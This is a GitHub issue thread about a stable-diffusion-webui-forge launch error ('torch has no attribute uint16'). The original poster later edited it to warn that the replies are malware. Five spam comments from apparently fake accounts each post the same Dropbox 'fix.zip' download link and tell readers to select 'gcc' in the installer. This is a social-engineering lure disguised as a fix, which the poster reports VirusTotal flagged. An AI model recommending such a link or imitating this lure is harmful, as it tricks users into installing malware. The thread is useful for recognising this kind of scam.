### ISSUE TITLE
Do not install links posted in this thread - virus spam posted by fake accounts (1st post is a a legit error report)

### ISSUE THREAD

**Issue by CCpt5** [lllyasviel/stable-diffusion-webui-forge#1506]
Edit: DO NOT DOWNLOAD THE FILE LINKED IN THE ACCOUNTS BELOW - THEY'RE MALWARE (CHECKED W/ VIRUS-TOTAL) - REPORT THESE USERS)

--
Going to rollback, but wanted to mention the error in case it's helpful and not exclusive to my setup:

```
venv "D:\stable-diffusion-webui-forge\venv\Scripts\Python.exe"
Python 3.10.11 (tags/v3.10.11:7d4cc5a, Apr  5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)]
Version: f2.0.1v1.10.1-previous-427-g82dfc2b1
Commit hash: 82dfc2b15be168c43e4d65585343b3911f561297
Launching Web UI with arguments: --ckpt-dir 'e:\Stable Diffusion Checkpoints\SDXL' --lora-dir 'd:\stable-diffusion-webui\models\Lora'
Total VRAM 24564 MB, total RAM 130776 MB
pytorch version: 2.1.2+cu121
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA GeForce RTX 4090 : native
Hint: your device supports --cuda-malloc for potential speed improvements.
VAE dtype preferences: [torch.bfloat16, torch.float32] -> torch.bfloat16
CUDA Using Stream: False
Traceback (most recent call last):
  File "D:\stable-diffusion-webui-forge\launch.py", line 54, in <module>
    main()
  File "D:\stable-diffusion-webui-forge\launch.py", line 50, in main
    start()
  File "D:\stable-diffusion-webui-forge\modules\launch_utils.py", line 546, in start
    import webui
  File "D:\stable-diffusion-webui-forge\webui.py", line 17, in <module>
    initialize_forge()
  File "D:\stable-diffusion-webui-forge\modules_forge\initialization.py", line 74, in initialize_forge
    from modules_forge.shared import diffusers_dir
  File "D:\stable-diffusion-webui-forge\modules_forge\shared.py", line 4, in <module>
    from backend import utils
  File "D:\stable-diffusion-webui-forge\backend\utils.py", line 1, in <module>
    import gguf
  File "D:\stable-diffusion-webui-forge\packages_3rdparty\gguf\__init__.py", line 3, in <module>
    from .gguf_reader import *
  File "D:\stable-diffusion-webui-forge\packages_3rdparty\gguf\gguf_reader.py", line 15, in <module>
    from .quants import quant_shape_to_byte_shape
  File "D:\stable-diffusion-webui-forge\packages_3rdparty\gguf\quants.py", line 11, in <module>
    from .quick_4bits_ops import change_4bits_order, quick_unpack_4bits, quick_unpack_4bits_u
  File "D:\stable-diffusion-webui-forge\packages_3rdparty\gguf\quick_4bits_ops.py", line 22, in <module>
    native_4bits_lookup_table = native_unpack_4x4bits_in_1x16bits_to_4x8bits_in_1x32bits(torch.arange(start=0, end=256*256, dtype=torch.long).to(torch.uint16))[:, 0]
  File "D:\stable-diffusion-webui-forge\venv\lib\site-packages\torch\__init__.py", line 1833, in __getattr__
    raise AttributeError(f"module '{__name__}' has no attribute '{name}'")
AttributeError: module 'torch' has no attribute 'uint16'
Press any key to continue . . .
```

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
